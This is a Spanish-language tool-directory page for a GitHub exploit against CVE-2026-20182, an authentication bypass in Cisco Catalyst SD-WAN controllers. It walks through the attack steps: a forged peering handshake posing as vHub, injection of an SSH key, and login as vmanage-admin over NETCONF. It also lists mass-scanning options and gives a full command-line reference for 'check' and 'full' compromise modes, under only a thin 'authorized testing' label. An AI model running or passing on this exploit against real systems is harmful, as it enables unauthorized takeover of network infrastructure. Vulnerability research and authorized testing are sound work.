Skip to content
KitploitKITPLOIT
HerramientasBlog
Log in
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-20182 — Omisión de autenticación de peering de Cisco Catalyst SD-WAN | Kitploit
Herramientas/GitHubGitHub/nxploited/cve-2026-20182
Autenticación y AutorizaciónAnálisis de VulnerabilidadesExplotaciónSeguridad de RedesPruebas de PenetraciónRed Teaming
GitHubnxploited/cve-2026-20182

CVE-2026-20182

Omisión de autenticación de peering de Cisco Catalyst SD-WAN

Ver Repositorio
128hace 4 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-20182

Omisión de autenticación de peering en Cisco Catalyst SD-WAN

CVE-2026-20182 — Omisión de autenticación de peering en Cisco Catalyst SD-WAN

Herramienta de evaluación para pruebas autorizadas de la omisión de autenticación de peering en Cisco Catalyst SD-WAN Controller / Manager (CVE-2026-20182).

CVECVE-2026-20182
GravedadCrítica (CVSS 10.0)
CVSS 3.1AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
ProductoCisco Catalyst SD-WAN Controller (anteriormente vSmart) · Cisco Catalyst SD-WAN Manager (anteriormente vManage)
ProblemaEl mecanismo de autenticación de peering no se aplica correctamente
ScriptCVE-2026-20182.py

Resumen de la vulnerabilidad

Aviso de mayo de 2026: Un fallo en el handshake de conexión de control / autenticación de peering permite que un atacante remoto no autenticado omita la autenticación y obtenga acceso interno con privilegios elevados en los sistemas afectados.

Un atacante envía solicitudes manipuladas al sistema afectado. Si tiene éxito, el atacante puede autenticarse como una cuenta interna, con privilegios elevados y no root y alcanzar NETCONF, lo que permite manipular la configuración del fabric de SD-WAN.

ElementoDetalle
Vector de ataqueRed
Privilegios requeridosNinguno
Interacción del usuarioNinguna
AlcanceCambiado
ImpactoConfidencialidad, integridad y disponibilidad: alta

Recomendación: Aplique los parches de seguridad de Cisco según las indicaciones oficiales del proveedor. Restrinja la exposición del plano de gestión, supervise las conexiones del plano de control y audite los controladores SD-WAN para detectar cambios de configuración no autorizados.


Contacto

Telegram: @KNxploited


Vista previa de consola

Consola de operaciones de CVE-2026-20182


Herramienta: CVE-2026-20182.py

Marco de explotación en Python 3 para CVE-2026-20182 contra vdaemon de Cisco SD-WAN (UDP/DTLS 12346).

Qué hace (paso a paso)

PasoFaseDescripción
1Cargar objetivosAnaliza targets.txt y combina duplicados por (host, domain_id, site_id)
2Comprobación previa de OpenSSLCarga las bibliotecas compartidas de OpenSSL 3.x/4.x para DTLS personalizado
3Conexión DTLSConecta al puerto UDP objetivo (siempre 12346 primero y luego los puertos opcionales de la lista)
4CHALLENGERecibe el CHALLENGE (0x08) del servidor
5CHALLENGE_ACKEnvía un CHALLENGE_ACK manipulado como vHub (tipo 2) — omisión de autenticación
6HelloCompleta el intercambio Hello — confirma la ruta de omisión
7aModo CHECKDetenerse aquí — registrar solo bypass / Hello OK (sin claves, sin SSH)
7bModo FULLInyectar la clave pública SSH mediante VMANAGE_TO_PEER
8ACK de inyecciónEsperar REGISTER_TO_VMANAGE (0x0D) como confirmación de protocolo
9Verificación SSHProbar el inicio de sesión como vmanage-admin en TCP 830 (NETCONF), opcionalmente 22
10SalidaClasificar los hallazgos en archivos por niveles + lista de comandos legible

Respaldo de fabric: Ante TEAR_DOWN o discrepancia de parámetros, reintenta con los valores alternativos de domain/site (1,100), (1,1), (0,0) a menos que se use --no-fallback.


Niveles de resultados (leer con atención)

NivelArchivoSignificado
01 — SSH confirmadocisco_sdwan_01_confirmed_ssh.jsonlssh_verified=true — único nivel tratado como prueba de compromiso total
02 — Solo inyección ACKcisco_sdwan_02_inject_ack_only.jsonlEl protocolo aceptó la inyección de clave; falló el inicio de sesión SSH
03 — Solo bypasscisco_sdwan_03_bypass_only.jsonlHello/bypass correctos; sin inyección confirmada

Importante

  • El modo check → como máximo nivel 03 (sonda de bypass). No es prueba de explotación completa.
  • El modo full → apunta al nivel 01 (ssh_verified).
  • https://host en la lista → solo sugerencia web TCP (80/443). No es DTLS UDP en el 443.

Requisitos

RequisitoNotas
Python3.9+
pipcryptography, rich
OpenSSLBibliotecas compartidas 3.x o 4.x (libssl + libcrypto) — obligatorio
pip install -r requirements.txt

OpenSSL (sistema)

Windows

  1. Instale Win64 OpenSSL 3.x o equivalente
  2. Agregue bin\ al PATH o establezca:
OPENSSL_HOME=C:\Program Files\OpenSSL-Win64

Linux

# Debian/Ubuntu
sudo apt install libssl3 openssl
export LD_LIBRARY_PATH=/usr/lib/x86_64-linux-gnu:$LD_LIBRARY_PATH

La herramienta sale al inicio si no se puede cargar OpenSSL.


Inicio rápido

Menú interactivo (predeterminado)

python CVE-2026-20182.py
  • Configure las opciones 1–11 y luego 0 = INICIAR ESCANEO
  • Modo de ejecución predeterminado: check (sonda de bypass segura)

No interactivo (automatización)

python CVE-2026-20182.py -y

Modos de ejecución

ModoOpciónInyección SSHVerificación SSHÚsalo cuando
CHECK--mode check (predeterminado)NoNoCribado masivo, detección de bypass
FULL--mode fullSíSí (salvo --no-ssh-verify)Prueba de compromiso

CHECK — solo sonda de bypass

python CVE-2026-20182.py -y --mode check

FULL — inyectar clave y verificar SSH (solo objetivos autorizados)

python CVE-2026-20182.py -y --mode full

Referencia de CLI (todas las opciones y ejemplos)

Objetivos y trabajadores

-f / --file — lista de objetivos (predeterminado: targets.txt)

python CVE-2026-20182.py -y -f my_controllers.txt --mode check

-t / --threads — subprocesos de trabajo (1–200, predeterminado 12)

python CVE-2026-20182.py -y -f targets.txt -t 30 --mode check

--domain — DOMAIN_ID predeterminado cuando no está en la lista (predeterminado: 1)

python CVE-2026-20182.py -y -f targets.txt --domain 1 --site 100 --mode check

--site — SITE_ID predeterminado cuando no está en la lista (predeterminado: 100)

python CVE-2026-20182.py -y -f targets.txt --domain 1 --site 50 --mode full

Modo y automatización

--mode — check | full

python CVE-2026-20182.py -y --mode full -f targets.txt

-y / --yes — omitir el menú interactivo; usar solo valores de CLI

python CVE-2026-20182.py -y -f targets.txt --mode check -t 20

Verificación SSH

--no-ssh-verify — omitir la prueba SSH posterior a la inyección (no recomendado en modo full)

python CVE-2026-20182.py -y --mode full --no-ssh-verify -f targets.txt

--verify-ssh22 — probar también TCP 22 después de 830

python CVE-2026-20182.py -y --mode full --verify-ssh22 -f targets.txt

UDP / fabric

--no-try-list-udp — solo UDP 12346; ignorar :port de la lista

python CVE-2026-20182.py -y --no-try-list-udp -f targets.txt --mode check

--extra-udp-ports — laboratorio: puertos UDP adicionales en cada host

python CVE-2026-20182.py -y --extra-udp-ports 8080,8443 -f targets.txt --mode check

--no-fallback — deshabilitar el reintento domain/site ante TEAR_DOWN

Descargar herramienta